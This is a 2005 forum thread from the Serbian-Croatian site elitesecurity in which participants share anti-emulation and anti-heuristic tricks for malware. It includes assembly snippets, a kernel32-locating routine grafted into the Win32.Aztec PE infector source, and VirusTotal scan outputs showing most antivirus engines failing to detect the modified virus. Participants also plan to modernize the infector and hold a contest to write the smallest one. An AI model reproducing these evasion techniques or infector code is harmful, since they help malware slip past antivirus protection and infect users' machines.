• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 11.05.2003. Google tips & tricks, new features,.. 25.06.2006. GNOME/GTK Tips & Tricks 26.01.2004. Korisne Mailing Liste 30.05.2004. Tips & Tricks 4 Windoze 02.08.2004. Google sandbox effect: tips & tricks? 28.12.2004. Cubase SX/SL Mastering And Mixing Tips 'n' Tricks.. 22.12.2004. 701 Tips for e-Learning, By Elliott Masie 09.02.2005. Ableton Live --- Navigacija Brisanje liste Aktuelne teme u ovom forumu: Prevodjenje intel asemblera Asembler prerada Vreme za aarch64 kako ovom asm programu povecati thread.. Win16 program dasm Koliko puta vam je trebalo da konvertu.. MIPS asm kod i bolje razumijevanje &qu.. avx sin,cos,tan f-je u asembleru Pomoc za pocetnika u Asembleru NSA ce objaviti disasembler Inicijalizacije stacka za STM32F103C8 .. Kada sort zavisi od redosleda pristupa Izracunavanje reciprociteta float64 br.. Program za konverziju 128 bit hex broj.. Optimizacija za dodavanje jedan Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil anti-emu tips'n'tricks 09.02.2005. u 07:22 - pre 233 meseci Evo jedan kul anti-emu trik. Tko ga prvi skuži, plaćam pivu :> Code: anti_emu           equ     <dd 0FF04C033h,75C00B48h,0F40174FBh> PS: Kolje eax! Odgovor na temu

zvrba The Lord of Chaos Član broj: 31716 Poruke: 105 *.fina.hr. Profil Re: anti-emu tips'n'tricks 09.02.2005. u 13:45 - pre 233 meseci Hm. Kad se to asemblira pa disasemblira dobije se Code: 00000000 <.text>:    0:   33 c0                   xor    %eax,%eax    2:   04 ff                   add    $0xff,%al    4:   48                      dec    %eax    5:   0b c0                   or     %eax,%eax    7:   75 fb                   jne    4 <.text+0x4>    9:   74 01                   je     c <.text+0xc>    b:   f4                      hlt Mrtva petlja od 255 iteracija dok eax ponovno ne postane 0 i tada je preskoci hlt.. or je suvisan jer dec vec postavi ZF kako treba. Cemu bi moglo sluzit.. za usporenje emulacije? Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.85.* +1 Profil Re: anti-emu tips'n'tricks 09.02.2005. u 14:48 - pre 233 meseci Da nije fora u tome sto emulator pokusava da izvrsi i instrukciju posle jmp/jcc/ret i call? Pa posle ovog je naleti na hlt? Mislim da ovo dodje kao onaj trik kad imas dva mrtva ret gde emu izvrsava prvi ret pa kaze ajde i drugi da probam i opet se umrtvi =) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 09.02.2005. u 16:26 - pre 233 meseci Većina "brzih" AV preskače naizgled bespotrebnu petlju i odmah idu na sljedeću instrukciju, zbog čega neće preskočiti onaj hlt, u emulatoru će se dogoditi iznimka i on će se završiti emulaciju. Vrlo jednostavan, vrlo glup i vrrrrlo učinkovit način za shebat većinu AV :> U biti, AV ne emuliraju doslovno izvođenje asm koda, već ga samo simuliraju. Emulator bi bio otporan na ovaj trik, neki gluplji simulatori neće, jer će pretpostaviti da mogu preskočiti taj dio koda bez mijenjanja ZF. Ovaj je trik vrlo star, ali neki glupi AV (Norton!) ga još uvijek puše kao ništa. Pokušat ću ponovo napisati isključivo generičku verziju PE infektora kojeg svi važniji AV detektiraju samo preko heuristika, pa ću testirati koliko je tko otporan na koju "caku" i postati ovdje rezultate. Da riješimo dilemu tko je najbolji jednom zauvijek :) Ako još netko ima kakav biser neka javi :> Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 09.02.2005. u 20:13 - pre 233 meseci Uzeo sam Win32.Aztec, klasika, jedan od prvih PE infektora, sors iz 29a #4, asemblirao i skenirao: Code: Scan results File: aztec.bin Date: 02/09/2005 20:58:11 (GMT+1) ---- AntiVir 6.29.0.11/20050209      found [W95/Aztec-1344] AVG     718/20050207    found [W95/Iced.1344] BitDefender     7.0/20050209    found [Win32.Aztec] ClamAV  devel-20050130/20050209 found [W95.Iced.1344] DrWeb   4.32b/20050209  found [modification of Win32.Belcebu.1376] eTrust-Iris     7.1.194.0/20050209      found [Win32/Aztec.1344] eTrust-Vet      11.7.0.0/20050209       found [Win32.Iced.1344] Fortinet        2.51/20050209   found [W32/Aztec.1344] F-Prot  3.16a/20050208  found [W32/Aztec.1344] Kaspersky       4.0.2.24/20050209       found [Virus.Win9x.Iced.1344] NOD32v2 1.994/20050209  found [probably unknown WIN32 virus] Norman  5.70.10/20050207        found [W32/Iced.1344] Panda   8.02.00/20050209        found [W95/Iced.1344] Sybari  7.5.1314/20050209       found [W32/Iced.134] Symantec        8.0/20050209    found [W32.Iced.1344] Dakle svi osim NOD32 ga detektiraju preko signatura. Nakon toga sam prije PRVE instrukcije virusa dodao ovaj anti-emu snippet, i vid čuda: Code: Scan results File: aztec.bin Date: 02/09/2005 21:02:45 (GMT+1) ---- AntiVir 6.29.0.11/20050209      found [Heuristic/Virus.Win32] AVG     718/20050207    found nothing BitDefender     7.0/20050209    found [Win32.Aztec] ClamAV  devel-20050130/20050209 found nothing DrWeb   4.32b/20050209  found nothing eTrust-Iris     7.1.194.0/20050209      found nothing eTrust-Vet      11.7.0.0/20050209       found [Win32.Iced.1344] Fortinet        2.51/20050209   found nothing F-Prot  3.16a/20050208  found nothing Kaspersky       4.0.2.24/20050209       found nothing NOD32v2 1.994/20050209  found [probably unknown WIN32 virus] Norman  5.70.10/20050207        found [W32/FileInfector] Panda   8.02.00/20050209        found [Suspect File] Sybari  7.5.1314/20050209       found [W32/NGVCK] Symantec        8.0/20050209    found [Bloodhound.W32.2] BRUUUUUUUUUUUUUUUUUUUUUUUKAAAAAAAAAAAAAAAAAA!!!! Dakle odmah u prvoj rundi ih je POLA palo. Uključujući famozni KAV :) A tek sam počeo. Duga je noć, vidjet ćemo još, hehe :) Ajd Vojislav, killer i ostali, znam da imate po još nekog asa u rukavu, da malo pljucnemo po AV i pokažemo kako su šuplje ti današnji razvikani komercijalni AV :) Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.87.* +1 Profil Re: anti-emu tips'n'tricks 09.02.2005. u 20:42 - pre 233 meseci Proveri mail siso =) onaj na gmail.com =))) Da vidis kako se jebe heuristika u zdrav mozak =))))) Vecina AV takodje trazi set instrukcija jmp/call/pop medjutim sta biva ako vas kod uopste tako i ne nalazi deltu? Sta cemo sad? tu pada heuristika, onda ajmo malo sa Thredovima da se igramo =) da vidimo kako to emulira neki AV =)) I tu padaju ko zvecke =) Ja sam ranije mislio da imena APIja se kriju zbog heuristike i slicno, medjutim to uopste nije tako... evo 2 pravila emulacij ili heuristike (sta je sta nekako je sve blizu a opet tako daleko) 1. delta nalazenje? ne koristiti jmp/call/push nego koristiti EPO za tu svrhu 2. heuristika gleda uvek zadnji section za sumnjivim kodom Dodajmo prazan section na kraj Rawsize = 0 RawOffset = 0, VirtualAddress = SizeOfImage VirtualSize = SectionAlignemnet, povecamo SizeOfimafe za SectionAlignment i dodamo jedan section iza optional headera =) To je bio nacin da zeznem heuristiku, ali ovaj sa EPO je mnooooogo bolji =))) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 09.02.2005. u 21:25 - pre 233 meseci Da....multithreaded aplikacije se jaaako teško emuliraju. Pogotovo kad ima onu running threads enkripciju o kojom sam ti pričao :> Sad ću dodavat caku po caku, i analizirat gdje koji AV puca. Ovaj je virus dosta star, malo ću ga modernizirati, hehe. Citat: 1. delta nalazenje? ne koristiti jmp/call/push nego koristiti EPO za tu svrhu Imam ideju. Da opalim nezavisnu mirko-nit koja će odrediti delta offset i zapisati ga sa WriteProcessMemory. Možda je čak i bolje nego skrivanje u domaćina. Citat: 2. heuristika gleda uvek zadnji section za sumnjivim kodom Ovaj kod što ja testiram jest prva generacija. Dakle nešto što bi baaaaš svi trebali naći. Ove komplikacije ćemo ostaviti za sami kraj, kad se pokaže tko ima najbolju heuristiku :> Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.85.* +1 Profil Re: anti-emu tips'n'tricks 09.02.2005. u 22:04 - pre 233 meseci Citat: Imam ideju. Da opalim nezavisnu mirko-nit koja će odrediti delta offset i zapisati ga sa WriteProcessMemory. Možda je čak i bolje nego skrivanje u domaćina. Ja upravo razvijam ideju za sledeci experimentalni kod koji ce samo da se zasniva na debugging funckijama (virtualAllocEx, CreateRemoteThread, Write/Read Process memory) =) Da vidim da ovde odrade emulaciju, samo jos mi nije jasno u glavi sta sve zelim da uradim pa ce mi treba duze vreme za razradjivanje ideje =) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 09.02.2005. u 23:32 - pre 233 meseci Još malo bruke.......užasno velike bruke :) Dakle, na taj sors od Win32.Aztec, samo sam izmjenio fju kojom traži bazu od kernel32.dll: Code: GetK32          proc _@1:    cmp     word ptr [esi],"ZM"         jz      WeGotK32 _@2:    sub     esi,10000h         loop    _@1 WeFailed:         mov     ecx,cs         xor     cl,cl         jecxz   WeAreInWNT         mov     esi,kernel_         jmp     WeGotK32 WeAreInWNT:         mov     esi,kernel_wNT WeGotK32:         xchg    eax,esi         ret GetK32          endp gdje su kernel_ i kernel_wNT predefinirani kao: Code:   kernel_         equ     0BFF70000h kernel_wNT      equ     077F00000h (Ovaj školski virus je star ~5 god, imate sors u 29a #4) E ja sam taj dio zamijenio sa svojom super-nadji-kernel32 fjom koju sam napravio za potrebe svog shellcode-a :) (sorry na lošem formatiranju, ne da mi se sad dotjerivat :) : Code: GetK32:                           call    __tab                    ; kernel imagebase table for different versions of vindoze:             dd    077E00000h                ; NT/W2k             dd    077E80000h                ; NT/W2k             dd    077ED0000h                ; NT/W2k             dd    077F00000h                ; NT/W2k             dd    0BFF70000h                ; 95/98             dd    077E60000h                ; XP home             dd    0BFF60000h                ; Me __tab:            pop    esi             push    7             pop    ebx                    ; ebx = counter __nxt_base:        dec    ebx             lodsd                        ; take one imagebase             call    _krnl_check                ; and check it             jecxz    __got_kernel             test    ebx, ebx                ; check table end             jnz    __nxt_base             mov    eax, fs:[TEB_PEB]            ; take ptr to PEB             test    eax, eax                ; > 80000000h ?             js    __PEB_try                ; !NT                         mov    eax, [eax.PEB_PebLdrData]             mov    esi, [eax.PEB_LDR_InInitOrderModuleList.LE_Flink]             lodsd                        ; go to second entry              mov    eax, [eax.LDR_ModuleBase-LDR_InInitializationOrderLdrEnt.LE_Flink]             call    _krnl_check             jecxz    __got_kernel              __PEB_try:        call    __PEB_x             mov     esp,[esp.EH_EstablisherFrame]        ; set SEH frame manually             jmp    __PEB_failed __PEB_x:        xor    eax, eax             push    dword ptr fs:[eax]             mov    fs:[eax], esp             mov    eax, fs:[TEB_PEB]            ; *PEB             mov    eax, [eax+34h]             mov    eax, [eax+0b8h]                ; now eax should be kernel's imagebase             call    _krnl_check __PEB_failed:        @SEH_RemoveFrame             jecxz    __got_kernel              __rec_scan:        mov    eax, [esp.(2*Pshd).Arg1.cPushad]    ; take kernel return address. skip pushad, SEH and one call             and    eax, -1 shl 16                ; align to 10 pages             add    eax, 2 shl 15                ; add 10 pages __1:            sub    eax, 2 shl 15                ; and loop per 10 pages             call    _krnl_check             jecxz    __got_kernel             jmp    __1                    ; we r gonna find that bloody kernel :) __got_kernel:        ret _krnl_check:        mov    ecx, eax                ; gotta set ecx so that we can return true             pusha             call    __temp             mov    esp, [esp.EH_EstablisherFrame]        ; set SEH manually             jmp    __end_k __temp:            xor    edx, edx             push    dword ptr fs:[edx]             mov    fs:[edx], esp             mov    edx, [eax.MZ_lfanew]            ; take RVA to PE header             mov    ebx, [edx+eax]                ; check PE signature             xor    ebx, 'SUN'                ; indirectly             sub    ebx, IMAGE_NT_SIGNATURE xor 'SUN'    ; lil sig             jnz    __end_k             cmp    eax, [edx+ecx.NT_OptionalHeader.OH_ImageBase]    ; check the predefined imagebase             jnz    __end_k             xor    ecx, ecx                ;no kernel for us :( __end_k:        @SEH_RemoveFrame             mov    [esp.Pushad_ecx], ecx             popa                       __end:            retn Pošto je ona stara metoda donekle obsoletna...i opalim ja sken....i šta to moje oči vide: Code: Scan results File: aztec.bin Date: 02/09/2005 23:51:51 (GMT+1) ---- AntiVir 6.29.0.11/20050209      found nothing AVG     718/20050207    found nothing BitDefender     7.0/20050209    found nothing ClamAV  devel-20050130/20050209 found nothing DrWeb   4.32b/20050209  found nothing eTrust-Iris     7.1.194.0/20050209      found nothing eTrust-Vet      11.7.0.0/20050209       found nothing Fortinet        2.51/20050209   found nothing F-Prot  3.16a/20050208  found [could be infected with an unknown virus] Kaspersky       4.0.2.24/20050209       found nothing NOD32v2 1.994/20050209  found [probably unknown WIN32 virus] Norman  5.70.10/20050207        found nothing Samo su Orion emulacijski engine iz f-prota i NOD32 u igri. A nisam ni počeo se igrati sa višenitnim stvarčicama, enkripcijom, pikanterijama OS-a... :> Idemo dalje. Odgovor na temu

Mikky Član broj: 18 Poruke: 1563 *.vdial.verat.net. ICQ: 44582291 +58 Profil Re: anti-emu tips'n'tricks 09.02.2005. u 23:34 - pre 233 meseci Evo moj skromni doprinos - nesto cime sam se zezao pre par godina (pre nego sto sam shvatio da od toga nema 'leba ) Nisam siguran da li je ovo vec provaljena fora al nema veze Code: start:                                    ; entry point         call delta_handle                ; uzimam delta handle na malo nestandardan nacin delta_handle:                           ; neki heuristcki skeneri nece ovo prepoznati         mov    ebp,[esp]                    ; kao virii kod (upalilo je kod NOD32)         add    esp,4                        ; za 1st generaciju         sub    ebp, offset delta_handle -I know UNIX, PASCAL, C, FORTRAN, COBOL, and nineteen other high-tech words. Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.85.* +1 Profil Re: anti-emu tips'n'tricks 10.02.2005. u 00:00 - pre 233 meseci E jebo si mu kevu sto si napisao rutinu za trazenje kernela =))) Zar nije bilo prostije da skeniras SEH ? =) Imaj malo milosti prema svojim ortacima koji moraju da citaju ovaj kod =))) I gde vrisis to skeniranje? Na netu? ili imas sve AVove kod kuce =) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 10.02.2005. u 01:58 - pre 233 meseci Citat: Vojislav Milunovic: E jebo si mu kevu sto si napisao rutinu za trazenje kernela =))) :) Pa šta joj fali? Baš je "jeba*ka". Koristi kombinaciju svih poznatih metoda koje nešto valjaju :) Citat: Zar nije bilo prostije da skeniras SEH ? =) Misliš PEB/TEB blok? Mislim da je onaj SEH koji prvo testira baze kernela na ne-winXP platformama i ubio većinu emulatora. Baš ću to sad probat. Tako star anti-debugging trik, a da se primjeniti i na obsfukiranje execution-flowa :> Citat: Imaj malo milosti prema svojim ortacima koji moraju da citaju ovaj kod =))) Pisao sam ja i ružnijeg koda :> Mogli bi i bacit neko natjecanje, tko će u manje bajtova napraviti neki infektor? Ne mora biti za PE, možemo i ELF. Evo ovdje sam jučer slučajno naletio asm tut za BSD. Znam da imaš nezavršen jedan virus za BSD, možda ti bude zanimljivo :> Samo bad je što mi se neće instalirati pa moram pod VMware ga pičit :( Citat: I gde vrisis to skeniranje? Na netu? ili imas sve AVove kod kuce =) http://www.virustotal.com/flash/index_en.html Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.86.* +1 Profil Re: anti-emu tips'n'tricks 10.02.2005. u 02:29 - pre 233 meseci Ma ne bas sam mislio SEH, pogledaj source sto sam ti poslao =) Doduse to jeste deo TEBa ali bas mislim na pointer i handler u okviru SEH, ono dok ne dodjes do 0XFFFFFFFF e kad nadjes taj handle onda je SEH ispred pointer na kernel32.dll pa samo umanjujes adresu 0x10000 i normalno obrises low word pre toga i tako trazis MZ =) Ne moz da omane =) http://nonenone.net/freebsd_tut.txt pa znam ja kako se pozivaju API na FreeBSD =) Uvek moras da imas jedan dummy dword pre int 0x80 =))) Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.86.* +1 Profil Re: anti-emu tips'n'tricks 10.02.2005. u 02:40 - pre 233 meseci Code: Results of a file scan This is the report of the scanning done over "iexplore.ex_" file that VirusTotal processed on 02/10/2005 at 03:36:07 (GMT+1). Antivirus Version Update Result  AntiVir 6.29.0.11 02.09.2005 no virus found  AVG 718 02.07.2005 no virus found  BitDefender 7.0 02.09.2005 no virus found  ClamAV devel-20050130 02.10.2005 no virus found  DrWeb 4.32b 02.09.2005 no virus found  eTrust-Iris 7.1.194.0 02.10.2005 no virus found  eTrust-Vet 11.7.0.0 02.09.2005 no virus found  Fortinet 2.51 02.09.2005 no virus found  F-Prot 3.16a 02.08.2005 no virus found  Kaspersky 4.0.2.24 02.10.2005 no virus found  NOD32v2 1.995 02.10.2005 no virus found  Norman 5.70.10 02.07.2005 no virus found  Panda 8.02.00 02.09.2005 no virus found  Sybari 7.5.1314 02.10.2005 no virus found  Symantec 8.0 02.09.2005 no virus found  lol =) Jos niko =) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 10.02.2005. u 02:42 - pre 233 meseci Citat: Vojislav Milunovic: Ma ne bas sam mislio SEH, pogledaj source sto sam ti poslao =) Doduse to jeste deo TEBa ali bas mislim na pointer i handler u okviru SEH, ono dok ne dodjes do 0XFFFFFFFF e kad nadjes taj handle onda je SEH ispred pointer na kernel32.dll pa samo umanjujes adresu 0x10000 i normalno obrises low word pre toga i tako trazis MZ =) Ne moz da omane =) Tako Aztec izvorno i koristi, align na 10 page-va je klasika :> Bolje je prvo lookup tablica, pa PEB, pa tek onda ta metoda jer je jako spora pošto za svako "fulavanje" se opali iznimka koja troši tisuće CPU ciklusa :> Citat: http://nonenone.net/freebsd_tut.txt pa znam ja kako se pozivaju API na FreeBSD =) Uvek moras da imas jedan dummy dword pre int 0x80 =))) Koliko ti je trebalo za ovaj textić, 10 min da ga napišeš? :) Šala :) Dobar ovaj BSD, mnogo mi se više sviđa nego onaj đumbus od linuxa :> Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 10.02.2005. u 09:03 - pre 233 meseci Evo, nakon temeljitog peterosatnog testiranja mogu reći da od testiranih AV samo NOD32, Panda i f-prot imaj nešto što se može nazvati heurističkim engine-om. Ostali su svi ostali baš totalno s*****. Prešao sam većinu najčešćih caka, gornja 3 ovaj modificirani Aztec detektiraju baš isključivo preko heuristika, dok fakin neuništivi Symantec još uvijek nalazi Bloodhound.W32.2 :) Mislim, znam da koristi klasičnu signaturu, samo još nisam "upecao" o kojem se snippetu koda radi :) Eto, tek tako da se zna :) Napisat ću tokom dana opširnije komentare, a sljedeću noć idemo na nasty anti-emu trikove, hehe. Btw Mikky onaj tvoj trik naravno ne djeluje protiv NOD32, ali zato f-prot ga ne prijavi! Kasnije, kad napravim još neke modifikacije, prijavi ga. Pa kad još neke, ne prijavi, sad kad sam unakazio ovaj Aztec opet ga prijavljue. Čudan ovaj f-prot :> Mogu vam reći da nakon što sam ovo prošao, ne bih se čudio da neki AV ovo detektiraju kao win32.Aztec: Code: #include <windows.h> char* oznaka1 = "[Win32.Aztec v1.01]"; char* oznaka2 = "(c) 1999 Billy Belcebu/iKX"; int main() {        MessageBox(0, "Aztec is a bugfixed version of my Iced Earth\nvirus, with some optimizations and with some\r"                      "'special' features removed. Anyway, it will\r"                      "be able to spread in the wild succefully :)\r"                      "(c) 1999 by Billy Belcebu/iKX", "[Win32.Aztec v1.01]", 0); } Pravo čudo kako neki AV imaju muda govoriti da imaju heuristike. Imaju qrac! Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.86.* +1 Profil Re: anti-emu tips'n'tricks 10.02.2005. u 15:02 - pre 233 meseci Haha ko je to presao na C =)))) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 11.02.2005. u 01:50 - pre 233 meseci Ma dobar je C za ovako nešto na brzinu. Mada je C# za klasu produktivniji alat :> Evo u C# složio programčić koji može slati mejl direktno na virustotal sa mojim testnim sample-om kao attachmentom, tako da ne moram svaki put ručno slati već ga mogu staviti u .bat gdje asembliram virii. U C-u bi trebao koristiti neku opskurnu biblioteku za SSL, a pazi kako je to u C# jednostavno: Code: public static void SaljiMejl()         {             MailMessage mejl = new MailMessage();             mejl.From = "[email protected]";             mejl.To = "[email protected]";             mejl.Subject = "SCAN";             mejl.Body = "SCAN";             mejl.Attachments.Add(new MailAttachment(argv[1]));             mejl.BodyFormat = MailFormat.Text;             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/smtsperver"] = "smtp.gmail.com";             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/smtpserverport"] = 25;             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/sendusing"] = 2;            mejl.Fields["http://schemas.microsoft.com/cdo/configuration/smtpauthenticate"] = 1;             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/sendusername"] = "sunnis";             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/sendpassword"] = "xxxxxxxxxxxxx";             mejl.Fields["http://schemas.microsoft.com/cdo/configuration/smtpusessl"] = 1;             try             {                 SmtpMail.SmtpServer = "smtp.gmail.com";                 SmtpMail.Send(mejl);             }             catch (System.Web.HttpException ehttp)             {                 Console.WriteLine(ehttp.Message + "\n" + ehttp.ToString());             }         } Dodaš ga još kao hotkey u ultraedit i stvar je rješena :> Samo je bad što moraš ručno gledati rezultat preko webmail sučelja, ali što je tu je, ionako čekaš po 10-ak min, a gmail se sam refresha :> Odgovor na temu

Vojislav Milunovic Član broj: 25 Poruke: 2117 195.252.86.* +1 Profil Re: anti-emu tips'n'tricks 11.02.2005. u 02:11 - pre 233 meseci Ma idi begaj, i sta mu dodje ovo cudo http://microsoft.com... A zar smtp.gmail.com ne ide preko 465 i ne trazi autentifikaciju? =))) Odgovor na temu

Sundance Član broj: 7510 Poruke: 2559 *.sava.sczg.hr. Profil Re: anti-emu tips'n'tricks 11.02.2005. u 02:47 - pre 233 meseci Pogledaj malo bolje pa ćeš vidjeti da postoje i username i pass :>> A može i preko 465 ili whatever, iako koristi SSL :> Oni Fields[] elementi su jaaako nedukementirane XML šeme koje interno koristi CDO API, preko koga je implementirana System.Web.Mail.MailMessage klasa. Ovo je totalno nedokumentirano, pogledaj samo na MSDN što piše. NIŠTA! LOL! Ima na webu sve i svašta za CDO, ali nisam našao nijedan primjer koji koristi SSL, a kojeg gmail zahtijeva. Samo gomila lamera moli da im netko napiše managed wrappere :)) Ludnica. Odgovor na temu